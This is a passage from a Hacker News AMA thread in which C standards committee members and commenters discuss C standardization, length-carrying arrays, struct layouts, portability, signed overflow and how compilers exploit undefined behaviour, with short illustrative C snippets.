Tell HN: C Experts Panel – Ask us anything about C
829 points by rseacord on April 14, 2020 | 962 comments
Hi HN,

We are members of the C Standard Committee and associated C experts, who have collaborated on a new book called Effective C, which was discussed recently here: https://news.ycombinator.com/item?id=22716068. After that thread, dang invited me to do an AMA and I invited my colleagues, so we upgraded it to an AUA. Ask us about C programming, the C Standard or C standardization, undefined behavior, and anything C-related!

The book is still forthcoming, but it's available for pre-order and early access from No Starch Press: https://nostarch.com/Effective_C.

Here's who we are:

rseacord - Robert C. Seacord is a Technical Director at NCC Group, and author of the new book by No Starch Press “Effective C: An Introduction to Professional C Programming” and C Standards Committee (WG14) Expert.

AaronBallman - Aaron Ballman is a compiler frontend engineer for GrammaTech, Inc. and works primarily on the static analysis tool, CodeSonar. He is also a frontend maintainer for Clang, a popular open source compiler for C, C++, and other languages. Aaron is an expert for the JTC1/SC22/WG14 C programming language and JTC1/SC22/WG21 C++ programming language standards committees and is a chapter author for Effective C.

msebor - Martin Sebor is Principal Engineer at Red Hat and expert for the JTC1/SC22/WG14 C programming language and JTC1/SC22/WG21 C++ programming language standards committees and the official Technical Reviewer for Effective C.

DougGwyn - Douglas Gwyn is Emeritus at US Army Research Laboratory and Member Emeritus for the JTC1/SC22/WG14 C programming language and a major contributor to Effective C.

pascal_cuoq - Pascal Cuoq is the Chief Scientist at TrustInSoft and co-inventor of the Frama-C technology. Pascal was a reviewer for Effective C and author of a foreword part.

NickDunn - Nick Dunn is a Principal Security Consultant at NCC Group, ethical hacker, software security tester, code reviewer, and major contributor to Effective C.

Fire away with your questions and comments about C!






Are there any plans to "clean up C"? A lot of effort has been put into alternative languages, which are great, but there is still a lot of momentum behind C, and it seems that a lot of improvements could be made in a backwards-compatible way without introducing much in the way of complexity. For example:

- Locking down some categories of "undefined behaviour" to be "implementation defined" instead.

- Proper array support (which passes around the length along with the data pointer).

- Some kind of module system that allows code to be imported without the possibility of name collisions.


There are "projects" underway to clean up the spec where it's viewed as either buggy, inconsistent, or underspecified. The atomics and threads sections are a couple of examples.

There are efforts to define the behavior in cases where implementations have converged or died out (e.g., two's complement, shifting into the sign bit).

There have been no proposals to add new array types and it doesn't seem likely at the core language level. C's charter is to standardize existing practice (as opposed to invent new features), and no such feature has emerged in practice. Same for modules. (C++ takes a very different approach.)


> no such feature has emerged in practice

Arrays with length constantly emerge among C users and libraries. They are just all incompatible because without standardization there is no convergence.


I think the problem is that C is simply ill-suited for these "high level" constructs. The best you're likely to get is an ad-hoc special library like for wchar_t and wcslen and friends. Do we really want that?

I'd argue that a linked list might make a better candidate for inclusion, because I've seen the kernel's list.h or similar implementations in many projects, and that stuff is trickier to get right than stuffing a pointer and a size_t in a struct.


Sounds like a good use of standardization. If there is existing implementation practice, please go ahead and submit a proposal. I would be happy to champion such a proposal if you can't attend in person.


It was an observation, not a suggestion.

When the language standardization body has not managed to add arrays with length in 48 years, I don't think they should be added at this point. The culture is backward-looking and incompatible with modern needs, and the people involved are old and incompatible with the future (no offense, so am I).

C standardization effort should focus on finishing the language, not developing it to match the modern world. I have programmed in C for over 20 years, since I was a teenager. It has long been the system programming language I'm most familiar with. For the last 10 years I have never written an executable. Just short callable functions from other languages. Python, Java, Common Lisp, Matlab, and 'horror of horrors' C++.

I think Standard C can live the next 50 years in gradual decline as a portable assembler called from other languages and a compilation target.

If I were to propose a new extension to the C language, I would instead propose a completely new language that can be optionally compiled into C and works side by side with old C code.


> If I were to propose a new extension to the C language, I would instead propose a completely new language that can be optionally compiled into C and works side by side with old C code.

There are a few somewhat popular languages that fit that description already, and none of them are suitable replacements for C (as far as I've seen). That's not to say there couldn't be a suitable replacement -- just that nobody in a position to do something about it wants the suitable replacement enough for it to have emerged, apparently.

I suspect the first really suitable complete replacement for C would be something like what Checked C [1] tried to be, but a little more ambitious and willing to include wholly new (but perhaps backward-compatible) features (like some of those you've proposed) implemented in an interestingly new enough way to warrant a whole new compile-to-C implementation. Something like that could greatly improve the use cases where a true C replacement would be most appreciated, and still fit "naturally" into environments where C is already the implementation language of choice via a piecemeal replacement strategy where the first step is just using the new language's compiler as the project compiler front end's drop-in replacement (without having to make any changes to the code at all for this first step).

1: https://www.microsoft.com/en-us/research/project/checked-c/


Sounds like you are describing Zig. https://ziglang.org


I haven't looked at Zig too closely yet (only started just a few minutes ago), but it immediately appears to me that this violates one of the requirements I suggested, as demonstrated by this use-case wish from my previous comment:

> > using the new language's compiler as the project compiler front end's drop-in replacement (without having to make any changes to the code at all for this first step)

I'll look into Zig more, though. Maybe I'll like it.

---

I stand corrected, given my phrasing. I should have specified that it needs to also support incrementally adding the new language's features while most of the code is still unaltered C, rather than (for instance) having to suddenly replace all the includes and function prototypes just because you want to add (in the case of Zig) an error "catch" clause.


You can use the Zig compiler to compile C with no modifications, and easily call C from Zig or Zig from C, so I'm not sure what more you're hoping for. A language that allows you to mix standard C and "improved C" in the same file sounds like a mess to me.


It depends on whether you're talking about an actual whole new, radically different language or something that is essentially C "with improvements". My point is not that C "with improvements" is the ideal approach, only that (at this time, for almost purely social reasons) I don't think C is really subject to replacement except by something that allows you to mix standard C and the "new language" because, apart from specific improvements, they are the same language.

This might come with huge drawbacks, but it still seems like the only socially acceptable way to fully replace C at this time; make it so you can replace it one line of code at a time in existing projects.


typedef struct {uint8_t *data; size_t len;} ByteBuf; is the first line of code I write in a C project.


Could you add some extra information about why this is so helpful or handy to have? I think it will benefit readers who are starting out with C, etc.


In C, dynamically-sized vectors don’t carry around size information with them, often leading to bugs. This struct attempts to keep the two together.


Memory corruption in the sudo password feedback code happened because the length and pointer sit as unrelated variables and have to be manipulated by two separate statements every time, like some kind of manually inlined function. For comparison, PuTTY's slice API handles a slice as a whole object in a single statement, keeping length and pointer consistent.


Another option is a struct with a FAM at the end.

  typedef struct {
      size_t len;
      uint8_t data[];
  } ByteBuf;
Then, allocation becomes

  ByteBuf *b = malloc(sizeof(*b) + sizeof(uint8_t) * array_size);
  b->len = array_size;
and data is no longer a pointer.


Well, your ByteBuf is still behind a pointer. You also now need to dereference it to get the length. It also can't be passed by value, since its size isn't known at compile time. You can also not have multiple ByteBufs pointing at subsections of the same region of memory.

Thing is, you rarely want to share just a buffer anyway. You probably have additional state, locks, etc. So what I do is embed my ByteBuf directly into another structure, which then owns it completely:

    typedef struct {
        ...
        ByteBuf mybuffer;
        ...
    } SomeThing;
So we end up with the same number of pointers (1), but with some unique advantages.


Right, totally depends on what you're doing. My example is not a good fit for intrusive use cases.


sizeof(ByteBuf) == sizeof(size_t), and you can pass it by value; I just don't think you can do anything useful with it because it'll chop off the data.


This will cause an alignment problem on any platform with data types aligned more strictly than size_t. You'd need an alignas(max_align_t) on the struct. At which point some people are going to be unhappy about the wasteful padding on a memory-constrained target.


Why not typedef struct {uint8_t *data, dataend} ?

Makes it easier to take subranges out of it


should be

  typedef struct {uint8_t *data, *dataend} 
if I'm not mistaken :)


What are the advantages of saving the end as a pointer? Genuinely curious. Seems like a length allows the end pointer to be quickly calculated (data + len), while being more useful for comparisons, etc.


You can remove the first k elements of a view with data += k.

With the length you would need to do data += k; length -= k

Especially if you want to use it as a safe iterator, you can do data++ in a loop.


> ...You can remove the first k elements of a view with data += k.

How would you safely free(data) afterwards? You'd need to keep an alloc'ed pointer somehow.


Got it. That is really neat, going to add to my bag of tricks...


Right. I always think the pointer declaration is part of the type. (That is why I do not use C. Is there really a good reason for this C syntax?)


That's a really bizarre layout for your struct. Why don't you put the length first?


Why would it matter? The bytes aren't inline, this is just a struct with two word-sized fields.

A possible tiny advantage of this layout is that a pointer to this struct can be used as a pointer to a pointer-to-bytes, without having to adjust it. Although I'm not sure that's not undefined behaviour.


I don't think that's undefined behavior. That's how C's limited form of polymorphism is utilized. For example, many data structures behind dynamic languages are implemented this way. A concrete example would be Python's PyObject structs, which all share PyObject_HEAD.

https://github.com/python/cpython/blob/master/Include/object...


I'm not sure if it matters. It might be better for some technical reason, such as speeding up double dereferences, because you don't need to add anything to get to the pointer. But to be honest I just copied it out of existing code.


Most platforms have instructions for dereferencing with a displacement.


The "existing practice" qualification refers to existing compiler extensions I'd guess. Then lobbying about the feature should be addressed to eg LLVM and GCC developers.


> C's charter is to standardize existing practice (as opposed to invent new features)

Passing a pair of arguments (a pointer and a length) is surely one of the more universal conventions among C programmers?


When they say "existing practice" they mean things already implemented in compilers -- not existing practice among developers.


This seems like a poor way to establish criteria for standardization. It essentially encourages non-standard practice and discourages portable code by saying that to improve the language standard we have to have mutually incompatible implementations.

It has been said that design patterns (not just in the GOF sense of the term) are language design smells, implying that when very common patterns emerge it is a de facto popular-uprising call for reform. That, to me, is a more ideal criterion for updating a language standard, but practiced conservatively to avoid too much movement too fast or too much language growth.

On the other hand, I think you might be close to what they meant by "existing practice". I'm just disappointed to find that seems like the probable case (though I think it might also include some convergent evolutionary library innovations by OS devs as well as language features by compiler devs).


One of the principles for the C language is that you should be able to use C on pretty much any platform out there. This is one of the reasons that other languages are often written in C.

In order to uphold that principle, it's important that the standard consider not just "is this useful" but "is this going to be reasonably straightforward for compiler authors to add". Seeing that people have already implemented a feature helps C to avoid landing in the "useful feature which nobody can use because it's not widely available" trap. (For example, C99 made the mistake of adding floating-point complex types in <complex.h> -- but these ended up not being widely implemented, so C11 backed that out and made them an optional feature.)


Different implementations are used for different purposes. If 20% of implementations are used for purposes where a feature would be useful, which of the following would be best:

1. Have 10% of implementations support the feature one way, and 10% support it in an incompatible fashion.

2. Require that all compiler writers invest the time and effort necessary to support the feature without regard for whether any of their customers would ever use it.

3. Specify that implementations may either support the feature or report that they don't do so, at their leisure, but that implementations which claim to support the feature must do so in the manner prescribed by the Standard.

When C89 was written, the Committee decided that rather than recognizing different categories of implementation that support different sets of features, it should treat the question of what "popular extensions" to support as a Quality of Implementation which could be better resolved by the marketplace than by the Committee.

IMHO, the Committee should recognize categories of Safely Conforming Implementation and Selectively Conforming Program such that if an SCI accepts an SCP, and the translation and execution environments satisfy all documented requirements of the SCI and SCP, the program will behave as described by the Standard, or report in Implementation-Defined fashion an inability to do so, period. Any other behavior would make an implementation non-conforming. No "translation limit" loopholes.


That's obviously true, but at the same time the specifics of how one chooses to set criteria for inclusion in the standard should probably keep in mind the social consequences. If the intended consequence (e.g. ensuring that implementation is easy enough and desired enough to end up broadly included for portability) and the likely consequence (e.g. reduced standardization of C capabilities in practice, with rampant reliance by developers on implementation-specific behavior to the point almost nobody writes portable code any longer) differ too much, it's time to revisit the mechanisms that get us there.


What is meant by "portable code"? Should it refer only to code that should theoretically be usable on all imaginable implementations, or should it be expanded to include code which may not be accepted by all implementations, but which would have an unambiguous meaning on all implementations that accept it?

Historically, if there was some action or construct that different implementations would process in different ways that were well suited to their target platforms and purposes, but were incompatible with each other, the Standard would simply regard such an action as invoking Undefined Behavior, so as to avoid requiring that any implementations change in a way that would break existing code. This worked fine in an era where people were used to relying upon precedent to know how implementations intended for certain kinds of platforms and purposes should be expected to process certain constructs. Such an approach is becoming increasingly untenable, however.

If instead the Standard were to specify directives and say that if a program starts with directive X, implementations may either process integer overflow with precise wrapping semantics or refuse to process it altogether, if it starts with directive Y, implementations may either process it treating "long" as a 32-bit type or refuse to process it altogether, etc. this would make it much more practical to write portable programs. Not all programs would run on all implementations, but if many users of an implementation that targets a 64-bit platform need to use code that was designed around traditional microcomputer integer types, a directive demanding that "long" be 32 bits would provide a clear path for the implementation to meet its customers' needs.


> What is meant by "portable code"? Should it refer only to code that should theoretically be usable on all imaginable implementations, or should it be expanded to include code which may not be accepted by all implementations, but which would have an unambiguous meaning on all implementations that accept it?

That's a good question. I'm not sure I know. I could hazard a guess at what would be "best", but I'm not particularly confident in my thoughts on the matter at this time. As long as how that is handled is thoughtful, practical, consistent, and well-established, though, I think we're much more than halfway to the right answer.

> Historically, if there was some action or construct that different implementations would process in different ways that were well suited to their target platforms and purposes, but were incompatible with each other, the Standard would simply regard such an action as invoking Undefined Behavior, so as to avoid requiring that any implementations change in a way that would break existing code.

If I understand correctly, that would actually be "implementation-defined", not "undefined".

> a directive demanding that "long" be 32 bits would provide a clear path for the implementation to meet its customers' needs

There are size-specific integer types specified in the C99 standard (e.g. `uint32_t`). I use those, except in the most trivial cases (e.g. `int main()`), and limit myself to those size-specific integer types that are "guaranteed" by the standard.


> If I understand correctly, that would actually be "implementation-defined", not "undefined".

That is an extremely common myth. From the point of view of the Standard, the difference between Implementation Defined behavior and Undefined Behavior is that implementations are supposed to document some kind of behavioral guarantee with regard to the former, even in cases where it would be impractical for a particular implementation to guarantee anything at all, and nothing that implementation could guarantee in those cases would be useful.

The published Rationale makes explicit an intention that Undefined Behavior, among other things, "identifies areas of conforming language extension".

> There are size-specific integer types specified in the C99 standard (e.g. `uint32_t`). I use those, except in the most trivial cases (e.g. `int main()`), and limit myself to those size-specific integer types that are "guaranteed" by the standard.

A major problem with the fixed-sized types is that their semantics are required to vary among implementations. For example, given

    int test(uint16_t a, uint16_t b, uint16_t c) { return a-b > c; }
some implementations would be required to process test(1,2,3); so as to return 1, and some would be required to process it so as to return 0.

Further, if one has a piece of code which is written for a machine with particular integer types, and a compiler which targets a newer architecture but can be configured to support the old set of types, all one would need to do to port the code to the new platform would be to add a directive specifying the required integer types, with no need to rework the code to use the "fixed-sized" types whose semantics vary among implementations anyway.


What is your definition of "portable"? Are you using that term to mean "code I write for one platform can run without modification on other platforms" or "the language I use for one platform works on other platforms"?

I think when you get down to the level of C you're looking at the latter much more than the former. C is really more of a platform-agnostic assembler. It's not a design smell to have conventions within the group of language users that are de-facto language rules. For reference, see all the PEP rules about whitespace around different language constructs. These are not enforced.

The whole point of writing a C program is to be close to the addressable resources of the platform, so you'd probably want to expose those low-level constructs unless there's a compelling reason not to. Eliminating an argument from a function by hiding it in a data structure is not that compelling to me since I can just do that on my own. And then I can also pass other information such as the platform's mutex or semaphore representation in the same data structure if I need to.

By the way, that convenient length+pointer array requires new language constructs for looping that are effectively syntactic sugar around the for loop. Or you need a way to access the members of the structure. And syntactic sugar constrains how you can use the construct. So I'm not sure that it adds anything to the language that isn't already there. And the fact that length+pointer is such a common construct indicates that most people don't have any issues with it at all once they learn the language.


> And the fact that length+pointer is such a common construct indicates that most people don't have any issues with it at all once they learn the language.

Given the prevalence of buffer overflow bugs in computing, I'd say that there are quite a few programmers who have quite a few issues with this concept in practice.

The rest of your arguments are quite sound, but I have to disagree with that one.


> What is your definition of "portable"?

In that particular statement at the beginning of my preceding comment, I meant portability across compiler implementations.

> Eliminating an argument from a function by hiding it in a data structure is not that compelling to me since I can just do that on my own.

I meant to refer more to the idea that, when doing it on your own in a particular way, the compiler could support applying a (set of) constraint(s) to prevent overflows (as an example), such that any constraint couldn't be bypassed except by very obviously intentional means. Just automating the creation of the very, very simply constructed "plus a numeric field" struct seems obviously not worth including as a new feature of the standardized language.

> the fact that length+pointer is such a common construct indicates that most people don't have any issues with it

I think you're measuring the wrong kind of problem. Even C programmers with a high level of expertise may have problems with this approach, because it's when programmer error causes a problem not caught by code review or the compiler via buffer overflows (for instance) that we see a need for more.


>There have been no proposals to add new array types and it doesn't seem likely at the core language level.

One alternative to adding types is to allow enforcing consistency in some structs with the trailing array:

    struct my_obj {
      const size_t n;
      //other variables
      char text[n];
    };
where for simplicity you might only allow the first member to act as a length (and it must of course be constant). The point is that then the initializer:

    struct my_obj b = {.n = 5};
should produce an object of the right size. For heap allocation you could use something like:

    void * vmalloc(size_t base, size_t var, size_t cnt) {
      void *ret = malloc(base + var * cnt);
      if (!ret) return ret;
      * (size_t *) ret = cnt;
      return ret;
    }


What should happen if you reassign the object?


What do you mean "reassign"?

You can't reassign the length variable since it's marked `const`. You should see something like "warning: assignment discards `const` qualifier from pointer target type" if you pass it to `realloc`, which tells you that you're breaking consistency (I guess this might be UB). You could write `vrealloc` to allow resizing such structs, which would probably be called like:

    my_obj *tmp = vrealloc(obj, sizeof(obj), sizeof(obj->text), obj->n, newsize);


What would you do with the old text? Delete it?


Could you please be more specific about what you're trying to say? I have no idea what your actual objection is.


I would love this.


Actually there was no need to disenfranchise non-two's-complement architectures. Now that SIMH has a CDC-1700 emulation, I had planned on producing a C system for it as an example for students who have never seen such a model.


Rather than trying to decide whether to require that all implementations must use two's-complement math, or suggest that all programs should support unusual formats, the Standard should recognize some categories of implementations with various recommended traits, and programs that are portable among such implementations, but also recognize categories of "unusual" implementations.

Recognizing common behavioral characteristics would actually improve the usability of arcane hardware platforms if there were ways of explicitly requesting the commonplace semantics when required. For example, if the Standard defined an intrinsic which, given a pointer that is four-byte aligned, would store a 32-bit value in 8-bits-per-byte little-endian format, leaving any bits beyond the eighth (if any) in a state which would be compatible with using "fwrite" to an octet-based stream, an octet-based big-endian platform could easily process that intrinsic as a byte-swap instruction followed by a 32-bit store, while a compiler for a 36-bit system could use a combination of addition and masking operations to spread out the bits.


This sounds like something memcpy would do already for you?


A 36-bit system with (it sounds like) 9-bit bytes stores bit 8 of an int in bit 8 of a char, and bit 9 of the int in bit 0 of the next char; memcpy won't change that. They're asking for something like:

  unsigned int x = in[0] + 512*in[1] + 512*512*in[2] + 512*512*512*in[3];
  /* aka x = *(int*)in */
  
  out[0] = x & 255; x>>=8;
  out[1] = x & 255; x>>=8;
  out[2] = x & 255; x>>=8;
  out[3] = x & 255;
  /* *not* aka *(int*)out = x */


The amount of effort for a compiler to process optimally all 72 variations of "read/write a signed/unsigned 2/4/8-byte big/little-endian value from an address that is aligned on a 1/2/4/8-byte boundary" would be less than the amount of effort required to generate efficient machine code for all the ways that user code might attempt to perform such an operation in portable fashion. Such operations would have platform-independent meaning, and all implementations could implement them in conforming fashion by simply including a portable library, but on many platforms performance could be enormously improved by exploiting knowledge of the target architecture. Having such functions/intrinsics in the Standard would eliminate the need for programmers to choose between portability and performance, by making it easy for a compiler to process portable code efficiently.


I'm not disagreeing, just showing code to illustrate why memcpy doesn't work for this. Although I do disagree that writing a signed value is useful - you can eliminate 18 of those variations with a single intmax_t-to-twos-complement-uintmax_t function (if you drop undefined behaviour for (unsigned foo_t)some_signed_foo this becomes a no-op). A set of sext_uintN functions would also eliminate 18 read-signed versions. Any optimizing compiler can trivially fuse sext_uint32(read_uint32le2(buf)), and minimal implementations would have less boilerplate to chew through.


> Although I do disagree that writing a signed value is useful

Although the Standard defines the behavior of signed-to-unsigned conversion in a way that would yield the same bit pattern as a two's-complement signed number, some compilers will issue warnings if a signed value is implicitly coerced to unsigned. Adding the extra 18 forms would generally require nothing more than defining an extra 24 macros, which seems like a reasonable way to prevent such issues.


Fair point; even if the combinatorial nature of it is superficially alarming, that's probably not a productive area to worry about feature creep in.


72 static in-line functions. If a compiler does a good job of handling such things efficiently, most of them could be accommodated by chaining to another function once or twice (e.g. to read a 64-bit value that's known to be at least 16-bit aligned, on a platform that doesn't support unaligned reads, read and combine two 32-bit values that are known to be 16-bit likewise).

Far less bloat than would be needed for a compiler to recognize and optimize any meaningful fraction of the ways people might write code to work around the lack of portably-specified library functions.


Ah, I see.


>clean up the spec

Would this involve further specification of bitfields? I feel the implementation-defined nature of bitfields limits their potential.


What parts of bitfields are implementation defined?


Looking here https://en.cppreference.com/w/c/language/bit_field it seems quite a bit. My main thought was how fields are laid out in memory. I know it would be a big change with endianness, but I thought a standard check might be useful...?


> C's charter is to standardize existing practice (as opposed to invent new features), and no such feature has emerged in practice. Same for modules. (C++ takes a very different approach.)

One thing that I'd really like to see would be some new categories of compliance. At present, the definition of "conforming C program" makes it possible to accomplish any task that could be done in any language with a "conforming C program", since the only thing necessary for something to be a conforming C program would be for there to exist some conforming implementation in the universe that accepts it. Unfortunately, the Standard says absolutely nothing useful about the effect of attempting to use an arbitrary conforming C program with an arbitrary conforming C implementation. It also fails to define a set of programs where it even attempts to say much of anything useful about the behavior of a freestanding implementation (since the only possible observable behavior of a strictly conforming program on a freestanding implementation would be `while(1);`).

I would propose defining the terms "Safely Conforming Implementation" and "Selectively Conforming Program" such that feeding any SCP to any SCI, in circumstances where the translation and execution environments satisfy all requirements documented for the program and implementation, would be required not to do anything other than behave as specified, or indicate in documented fashion a refusal to do so. An implementation that does anything else when given a Selectively-Conforming Program would not be Safely Conforming, and a program which a Safely Conforming Implementation could accept without its behavior being defined thereon would not be a Selectively Conforming Program.

While it might seem awkward to have many implementations support different sets of features, determining whether a Safely Conforming Implementation supports all the features needed for a Selectively Conforming Program would be trivially easy: feed the program to the implementation and see if it accepts it.

I think there's a lot of opposition to "optional" features because of a perception that features that are only narrowly supported are failures. I would argue the opposite. If 20% of compilers are used by people who would find a feature useful, having the feature supported by that 20% of compilers, while the maintainers of the other 80% direct their effort toward things other than support for the feature, should be seen as a superior outcome to mandating that compiler writers waste time on features that won't benefit their customers.

Realistically speaking, it would be impossible to define a non-trivial set of programs that all implementations must process in useful fashion. Instead of doing that, I'd say that the question of whether an implementation can usefully process any program is a Quality of Implementation issue, provided that implementations reject all programs that they can't otherwise process in any other conforming fashion.


I think we are always looking at ways to "clean up C" but that this has to be done very carefully not to break existing code. For example, the committee recently voted to remove support for function definitions with identifier lists from C2x (http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2432.pdf). At least one vendor was not very happy with this decision.

Undefined behaviors tend to be undefined for a reason and shouldn't be thought of as defects in the standard. In my years on the committee, I have always argued to define as much behavior as possible and to as narrowly define undefined behaviors as possible.

We also had a recent discussion about adding additional name spaces (when discussing reserved identifiers), but it didn't gain much traction.


C has strayed very far from the original intent because compiler authors prioritized benchmark results at the expense of real-world use cases. This bad trend needs to be reversed.

Consider signed integer overflow.

The intent wasn't that the compiler could generate nonsense code if the programmer overflowed an integer. The intent was that the programmer could determine what would happen by reading the hardware manual. You'd wrap around if the hardware naturally would do so. On some other hardware you might get saturation or an exception.

In other words, all modern computers should wrap. That includes x86, ARM, Power, Alpha, Itanium, SPARC, and just about everything else. I don't believe you can even buy non-wrapping hardware with a C99 or newer compiler. Since this is likely to remain true, there is no longer any justification for retaining undefined behavior that is getting abused to the detriment of C users.
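For anyone who needs guaranteed wrapping today without relying on -fwrapv, the usual trick is to do the arithmetic in unsigned, which is defined to wrap modulo 2^N, and convert back. One caveat, hedged in the comment: the final conversion of an out-of-range value to int is implementation-defined before C23, though every mainstream two's-complement compiler truncates as you'd expect.

```c
#include <limits.h>

/* Well-defined wraparound addition: unsigned arithmetic wraps by
 * definition. The conversion of an out-of-range result back to int is
 * implementation-defined pre-C23, but in practice is two's-complement
 * truncation on all mainstream compilers. */
int wrapping_add(int a, int b)
{
    return (int)((unsigned)a + (unsigned)b);
}
```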


There are some add-with-saturation opcodes in 8bit-element-size SIMD ISAs, I think that includes x86_64, some recent Nvidia GPUs, and the Raspberry Pi 1's VideoCore IV's strange 2D-register-file vector unit made for implementing stuff like VP8/H.264 on it. They are afaik always opt-in, though.


If most C developers wanted to trade the performance they get from the compiler being able to assume `n+1 > n` for signed integer n, it would happen.


Most of the useful optimizations that could be facilitated by treating integer overflow as jump-the-rails undefined behavior could be facilitated just as well by allowing implementations to behave as though integers may sometimes, non-deterministically, be capable of holding values outside their range. If integer computations are guaranteed never to have side effects beyond yielding "weird" values, programs that exploit that guarantee may be processed to more efficient machine code than those which must avoid integer overflow at all costs.


How is this better behavior?


Many programs are subject to two constraints:

1. Behave usefully when practical, if given valid data.

2. Do not behave intolerably, even when given maliciously crafted data.

For a program to be considered usable, point #1 may sometimes be negotiable (e.g. when given an input file which, while valid, is too big for the available memory). Point #2, however, should be considered non-negotiable.

If integer calculations that overflow are allowed to behave in loosely-defined fashion, that will often be sufficient to allow programs to meet requirement #2 without the need for any source or machine code to control the effects of overflow. If programmers have to take explicit control over the effects of overflow, however, that will prevent compilers from making use of any overflow-related optimizations that would be consistent with loosely-defined behavior.

Under the kind of model I have in mind, a compiler would be allowed to treat temporary integer objects as being capable of holding values outside the range of their types, which would allow a compiler to optimize e.g. x*y/y to x, or x+y>y to x>0, but the effects of overflow would be limited to the computation of potentially weird values. If a program would meet requirements regardless of what values a temporary integer object holds, allowing such objects to acquire such weird values may be more efficient than requiring that programs write code to prevent computation of such values.


Intolerable is too situation specific.

Integer overflows that yield "weird values" in one place can easily lead to disastrous bugs in another place. So the safest thing in general would be to abort on integer overflow. But I'm sure there are applications where that, too, is intolerable. Kinda hard to have constraint 2 then.


Having a program behave in an unreliable, uselessly unpredictable fashion can only be tolerable in cases where nothing the program would be capable of doing would be intolerable. Such situations exist, but they are rare.

Otherwise, the question of what behaviors would be tolerable or intolerable is something programmers should know, but implementations cannot. If implementations offer loose behavioral guarantees, programmers can determine if they meet requirements. If an implementation offers no guarantees whatsoever, however, that is not possible.

If the only thing about overflow is that temporary values may hold weird results, and if certain operations upon a "weird" result (e.g. assignment to anything other than an automatic object whose address is never taken) will coerce it into a possibly-partially-unspecified number within type's range, then a program may ensure that behavior will be acceptable regardless of what weird values result from computation.

According to the published Rationale, the authors of C89 would have expected that something like:

    unsigned mul(unsigned short x, unsigned short y)
    { return (x*y); }
would on most implementations yield an arithmetically-correct result even for values of (x*y) between INT_MAX+1U and UINT_MAX. Indeed, I rather doubt they could imagine any compiler for a modern system would do anything other than yield an arithmetically-correct result or--maybe--raise a signal or terminate the program. In some cases, however, that exact function will disrupt the behavior of its caller in nonsensical fashion. Do you think such behavior is consistent with the C89 Committee's intention as expressed in the Rationale?
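For what it's worth, the usual workaround for that exact trap is to force the arithmetic into unsigned before the promotions bite (`mul_safe` is my name for it): on a platform with 16-bit short and 32-bit int, both operands of `x*y` promote to signed int, so products above INT_MAX are UB, even though the function returns unsigned. Casting one operand keeps the whole multiplication in unsigned arithmetic, which wraps by definition.

```c
/* The promotion trap defused: (unsigned)x makes the multiplication
 * unsigned, so 65535 * 65535 is well-defined rather than signed
 * overflow. */
unsigned mul_safe(unsigned short x, unsigned short y)
{
    return (unsigned)x * y;
}
```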


> Do you think such behavior is consistent with the C89 Committee's intention as expressed in the Rationale?

No, but in general I'm ok with integer overflows causing disruptions (and I'm happy that compilers provide an alternative, in the form of fwrapv, for those who don't care).

I do think that the integer promotions are a mistake. I would also welcome a standard, concise, built-in way to perform saturating or overflow-checked arithmetic that both detects overflows as well as allows you to ignore them and assume an implementation-defined result.

As it is, preventing overflows the correct way is needlessly verbose and annoying, and leads to duplication of APIs (like reallocarray).
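As a stopgap, GCC and Clang already expose checked arithmetic as builtins (and C23 standardizes the same idea as ckd_add/ckd_sub/ckd_mul in <stdckdint.h>). A sketch, assuming one of those compilers; the builtin returns true when the mathematically correct result did not fit:

```c
#include <stdbool.h>
#include <limits.h>

/* Overflow detection without UB: __builtin_add_overflow computes the
 * wrapped result into *res and reports whether it overflowed. */
bool add_overflows(int a, int b)
{
    int r;
    return __builtin_add_overflow(a, b, &r);
}

/* Saturating addition layered on the same builtin. */
int sat_add(int a, int b)
{
    int r;
    if (__builtin_add_overflow(a, b, &r))
        return a > 0 ? INT_MAX : INT_MIN;
    return r;
}
```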


I wouldn't mind traps on overflow, though I think overflow reporting with somewhat loose semantics that would allow an implementation to produce arithmetically correct results when convenient, and give a compiler flexibility as to when overflow is reported, could offer much better performance than tight overflow traps. On the other hand, the above function will cause gcc to silently behave in bogus fashion even if the result of the multiplication is never used in any observable fashion.


It lets you check that a+b > a for unknown unsigned b or signed b known > 0, to make sure addition didn’t overflow. I’m rather certain all modern C compilers will optimize that check out.
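To make that concrete (helper names are mine): the unsigned check is well-defined and a compiler must keep it, while the signed version has to test *before* adding, since the overflowing addition itself would be the UB.

```c
#include <stdbool.h>
#include <limits.h>

/* Unsigned addition wraps, so a + b < a exactly when it wrapped.
 * This check is well-defined and cannot legally be optimized away. */
bool uadd_overflows(unsigned a, unsigned b)
{
    return a + b < a;
}

/* For signed operands, test the precondition without performing the
 * potentially-overflowing addition. */
bool sadd_overflows(int a, int b)
{
    return (b > 0) ? (a > INT_MAX - b)
                   : (a < INT_MIN - b);
}
```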


Does it concern you how aggressively compiler teams are exploiting UB?


You do have to understand that compiler teams aren't saying something like "this triggers UB, quick just replace it with noop." It's just something that naturally happens when you need to reason about code.

For example, consider a very simple statement.

    let array[10];
    let i = some_function();
    print(array[i]);
The function might not even be known to the compiler at compilation time if it was from a DLL or something.

But the compiler is like "hey! you used the result of this function as an index for this array! i must be in the range [0, 10)! I can use that information!"


> But the compiler is like "hey! you used the result of this function as an index for this array! i must be in the range [0, 10)! I can use that information!"

As a developer who has seen lots of developers (including himself) make really dumb mistakes, this seems like a very strange statement.

Imagine if you hired a security guard to stand outside your house. One day, he sees you leave the house and forget to lock the door. So he reasons, "Oh, nothing important inside the house today -- guess I can take the day off", and walks off. That's what a lot of these "I can infer X must be true" reasonings sound like to me: they assume that developers don't make mistakes; and that all unwanted behavior is exactly the same.

So suppose we have code that does this:

  int array[10];
  int i = some_function();

  /* Lots of stuff */
  if ( i > 10 ) {
    return -EINVAL;
  }

  array[i] = newval;
And then someone decides to add some optional debug logging, and forgets that `i` hasn't been sanitized yet:

  int array[10];
  int i = some_function();

  logf("old value: %d\n", array[i]);

  /* Lots of stuff */

  if ( i > 10 ) {
    return -EINVAL;
  }

  array[i] = newval;
Now reading `array[i]` if `i` > 10 is certainly UB; but in a lot of cases, it will be harmless; and in the worst case it will crash with a segfault.

But suppose a clever compiler says, "We've accessed array[i], so I can infer that i < 10, and get rid of the check entirely!" Now we've changed an out-of-bounds read into an out-of-bounds write, which has changed worst-case a DoS into a privilege escalation!

I don't know whether anything like this has ever happened, but 1) it's certainly the kind of thing allowed by the spec, 2) it makes C a much more dangerous language to deal with.
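A defensive rewrite of that pattern is to validate the index before *any* use of it, including the logging (note that the `i > 10` test above also lets through `i == 10` and negative values). Sketched with an illustrative function name:

```c
#include <errno.h>
#include <stdio.h>

/* Hypothetical rewrite of the example above: sanitize i before any
 * access, and check both bounds. Once the check dominates every use,
 * there is nothing left for the compiler to "infer" away. */
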